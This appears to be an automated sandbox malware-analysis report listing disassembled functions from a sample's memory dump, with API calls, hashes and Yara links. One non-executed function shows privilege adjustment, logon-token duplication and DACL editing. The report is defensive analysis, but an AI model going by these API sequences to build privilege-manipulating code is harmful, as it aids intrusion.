Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: d5011c6801be7c7640d02bc31c6804334500958a921a9aec321635804c4955f4
Instruction ID: 63451c140fca3626035b2e8a86d87d0863ec56c84affa78933f30045ffdf57ce
Opcode Fuzzy Hash: d5011c6801be7c7640d02bc31c6804334500958a921a9aec321635804c4955f4
Instruction Fuzzy Hash: 77D13B75A0420ADFCB14EF98C481EEDBBB5FF58310F14415AE915AB291DB31AD41CFA0

Function 00D6F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a5519da587148baaa62e09d1130cbf0ad8c5fbc075d75208de7af1670945840
Instruction ID: c715ff4559c944992ceeebd7126fb35d646ab82fa2aa7f8b05295090d8081dfe
Opcode Fuzzy Hash: 8a5519da587148baaa62e09d1130cbf0ad8c5fbc075d75208de7af1670945840
Instruction Fuzzy Hash: 6051E835A00604AFDB10DF69E851BA97BA1EF89364F19C168E858DB391D731ED42CF70

Function 00DAFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00DAFCCE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 6020e6c38149f8dbffd4e56f1adf8ea8ad8c2802b2efe17fb9cca03fd5ed6075
Instruction ID: 858fe482272bbba817bc8575b39ed3864360f2073523fbfc3c6cee205bef296e
Opcode Fuzzy Hash: 6020e6c38149f8dbffd4e56f1adf8ea8ad8c2802b2efe17fb9cca03fd5ed6075
Instruction Fuzzy Hash: 0041B576500209AFCB12EFA8C8819AEB7B8EF45314B24457EE556D7251EB70DE05CB70

Function 00D46679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D4668B,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D4664A
Part of subcall function 00D4663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D4665C
Part of subcall function 00D4663E: FreeLibrary.KERNEL32(00000000,?,?,00D4668B,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D4666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D466AB

Part of subcall function 00D46607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D85657,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D46610
Part of subcall function 00D46607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D46622
Part of subcall function 00D46607: FreeLibrary.KERNEL32(00000000,?,?,00D85657,?,?,00D462FA,?,00000001,?,?,00000000), ref: 00D46635

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: f11c9d00a18d0a5fc3e9cc1ab5c6db9a1f3b9f10cb3a12ee837075cfd60c0dba
Instruction ID: 29f705006bc7766c2d224d7a49b2315dd2c0913d03a8b0448bfa19cfb7974ed6
Opcode Fuzzy Hash: f11c9d00a18d0a5fc3e9cc1ab5c6db9a1f3b9f10cb3a12ee837075cfd60c0dba
Instruction Fuzzy Hash: FC110672640205ABCF14BF24CC02BAD7BA5DF52710F11446EF483A61C2EE71DA05DB72

Function 00D78782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00D787C0

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 53b0bb46928a0b204bbd1e09d9f4a7d631c585c06da57e9f8357dbe092fd9c5a
Instruction ID: 4203c5e6021ddda24b5d3d96085647d5942af157425626b2aa17b145d4a41962
Opcode Fuzzy Hash: 53b0bb46928a0b204bbd1e09d9f4a7d631c585c06da57e9f8357dbe092fd9c5a
Instruction Fuzzy Hash: 1A11487290420AAFCB05DF58E94499A7BF4EF48300F1080A9F809AB311EA31EA119BA5

Function 00D75373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D74FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D7319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D75031

_free.LIBCMT ref: 00D753DF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: d9d6660bdaa44aef7d496e865ec92b46d9ba98a2cd6949728d95bce1e3c5619d
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 1501F972200745ABE3358F69E88195AFBEDEF85370F65461DE58883280FBB0A905C775

Function 00D6E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: e706097e387a2a4f30c13bd4fb1c80d89f47796793fcbf308e4e822e57715702
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 0FF02836500A2097D6313B6BEC05B6A3399CF42334F148B27F569931D1FB70E8068AF2

Function 00DBF94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00DBF987

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 9b548f98c197d8e9ffee82098be9b9078371de965a6f90e82e778f9a82205133
Instruction ID: e307bceed089d50bcfd7c63b1a6267264ca66df0aefa8e633e0fa4f6cac92a46
Opcode Fuzzy Hash: 9b548f98c197d8e9ffee82098be9b9078371de965a6f90e82e778f9a82205133
Instruction Fuzzy Hash: 73F06972600204BFCB00EBA5CC4AE9F7BA8EF4A720F000055F505DB261DA74AA41CB70

Function 00D74FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D7319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D75031

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62d56ab3ae4ce74cadd9f9515dc578fe2489b4eab5cd21f75b6e14a31895a204
Instruction ID: c31ec89c8c876b4d1fb5d8440fe997c4936c96f920ee7257c43060969c42fcfd
Opcode Fuzzy Hash: 62d56ab3ae4ce74cadd9f9515dc578fe2489b4eab5cd21f75b6e14a31895a204
Instruction Fuzzy Hash: 72F0B432551E20A7DB311A66FC01B5A3748EF417A0F18C015B81CDB198FAA0D80146F2

Function 00D73B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00D66A79,?,0000015D,?,?,?,?,00D685B0,000000FF,00000000,?,?), ref: 00D73BC5

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cec538fe3a618e8e7bc189bda125465558d513e0978e0777a5a6aa5a479d7b05
Instruction ID: cd61767e0a4da40db1e39a4f218bf33d29ad50b5462a254e8571fb9c288811c9
Opcode Fuzzy Hash: cec538fe3a618e8e7bc189bda125465558d513e0978e0777a5a6aa5a479d7b05
Instruction Fuzzy Hash: 32E06D31261A21A7DB312AB6EC01B5B7A48EF817A0F198161EC9DA6591EB70CE40A5B4

Function 00D466E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b0143ec7372f35c195261ce6b91dd338a0af8b595fc5d43d2883ea91f0a299d
Instruction ID: 89797a4282abbda79d722c651758dc0d55a03fec5936e0e8dbdfde8e35493f58
Opcode Fuzzy Hash: 1b0143ec7372f35c195261ce6b91dd338a0af8b595fc5d43d2883ea91f0a299d
Instruction Fuzzy Hash: 11F01575105702CFCB389F64E8A0826BBE4AF15329328897EE1D786A10C732D840DF21

Function 00D4684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00D46868

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 170c37e0425b1be4e4d8b618d0de6566dbf30beae2c7c72bb70eecc76ad75393
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 4EF0F87550020DFFDF05DF90C941E9E7BB9FB04318F248445F9159A151C336EA21ABA1

Function 00D43907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D43963

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: ba0526bca1ffa6f0c16a90d4b96d0fdb44873ff75046289f24fde464b1cfcb03
Instruction ID: bc01669bdc4d72f0255115302b5270d8447bb810b0b3385356e53c43c744eb05
Opcode Fuzzy Hash: ba0526bca1ffa6f0c16a90d4b96d0fdb44873ff75046289f24fde464b1cfcb03
Instruction Fuzzy Hash: B3F0A7709003059FEB529F24DC457D57BBCA701708F0440A9A254A6281D774479CCF51

Function 00D43A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00D43A76

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 8d4fe878ed37155f997ff8012e3964430bb8231c961de11fb3b407bd6d3f6ae0
Instruction ID: 2fb210936139dfe666d1d6995e82bc7e7599c1c35d4c4ac11ee74740bfd30ae0
Opcode Fuzzy Hash: 8d4fe878ed37155f997ff8012e3964430bb8231c961de11fb3b407bd6d3f6ae0
Instruction Fuzzy Hash: 1AE0C272A012285BCB20A2589C06FEE77EDDFC87A0F0440B1FC09D7258DA60ED8096B4

Function 00D8071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00D80A84,?,?,00000000,?,00D80A84,00000000,0000000C), ref: 00D80737

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5f9999cf2a727762eb94098a425db94e55d07cdf19fd95cfe7ef9c23ff26176d
Instruction ID: d148ae54d2e46dfde8513776a91a458494c440d06bee479a24256727c3bb4ca9
Opcode Fuzzy Hash: 5f9999cf2a727762eb94098a425db94e55d07cdf19fd95cfe7ef9c23ff26176d
Instruction Fuzzy Hash: C1D06C3200020DBBDF028F84DD06EDA3BAAFB48714F014000BE1896120C732E821AB90

Function 00DAEAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00DAD840), ref: 00DAEAB1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ac44cf82dd032840613ba2360c77233f0ab6647f0c558fb9dada50b60f54090a
Instruction ID: bdda860a3b6be220276ae2c93ae5f2956e975909cfd88626c257314e3c278db7
Opcode Fuzzy Hash: ac44cf82dd032840613ba2360c77233f0ab6647f0c558fb9dada50b60f54090a
Instruction Fuzzy Hash: 73B0922404160005AD280A785A09AAA370178833A57DC1BC0E479861E1C339880FF970

Function 00DB664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00DADC54: FindFirstFileW.KERNEL32(?,?), ref: 00DADCCB
Part of subcall function 00DADC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00DADD1B
Part of subcall function 00DADC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00DADD2C
Part of subcall function 00DADC54: FindClose.KERNEL32(00000000), ref: 00DADD43

GetLastError.KERNEL32 ref: 00DB666E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: a96f25d905ee60b1b8fcb3c095eda54d11953e9ecfe9673d63d1822df9ad0131
Instruction ID: 37530ed0bf5fc60c9bfa7f3e37fc67c83a4c312e2f5c41c7a9ec07d2f53e5562
Opcode Fuzzy Hash: a96f25d905ee60b1b8fcb3c095eda54d11953e9ecfe9673d63d1822df9ad0131
Instruction Fuzzy Hash: 88F08C362002009FCB14EF59D845B6EB7E5EF88360F048459F90A8B362CB74BC01CBB0

Non-executed Functions

Function 00DA1B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00DA2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DA205A
Part of subcall function 00DA2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DA2087
Part of subcall function 00DA2010: GetLastError.KERNEL32 ref: 00DA2097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DA1BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DA1BF4
CloseHandle.KERNEL32(?), ref: 00DA1C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DA1C1D
GetProcessWindowStation.USER32 ref: 00DA1C36
SetProcessWindowStation.USER32(00000000), ref: 00DA1C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DA1C5C

Part of subcall function 00DA1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DA1B48), ref: 00DA1A20
Part of subcall function 00DA1A0B: CloseHandle.KERNEL32(?,?,00DA1B48), ref: 00DA1A35

Strings

default, xrefs: 00DA1C57
, xrefs: 00DA1BA6
winsta0, xrefs: 00DA1C18
j, xrefs: 00DA1CDE

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$j
API String ID: 22674027-2615587742
Opcode ID: 7607a9ae89acf909539a9bb6c620f2c2dc55c8bafcd93ff3d96b6b2ae0f80b29
Instruction ID: 80a4713f85a2e9c1970d4c83e5e16d21e73ab6c7ba7418605cdc9ecff4a42687
Opcode Fuzzy Hash: 7607a9ae89acf909539a9bb6c620f2c2dc55c8bafcd93ff3d96b6b2ae0f80b29
Instruction Fuzzy Hash: 5C817775901309ABDF219FA4CD49FEE7BB9EF0A300F18442AF915E62A0D7718A45CB70

Function 00DA14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DA1A60
Part of subcall function 00DA1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A6C
Part of subcall function 00DA1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A7B
Part of subcall function 00DA1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DA14E7,?,?,?), ref: 00DA1A82
Part of subcall function 00DA1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DA1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DA1518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DA154C
GetLengthSid.ADVAPI32(?), ref: 00DA1563
GetAce.ADVAPI32(?,00000000,?), ref: 00DA159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DA15B9
GetLengthSid.ADVAPI32(?), ref: 00DA15D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DA15D8
HeapAlloc.KERNEL32(00000000), ref: 00DA15DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DA1600
CopySid.ADVAPI32(00000000), ref: 00DA1607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DA1636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DA1658
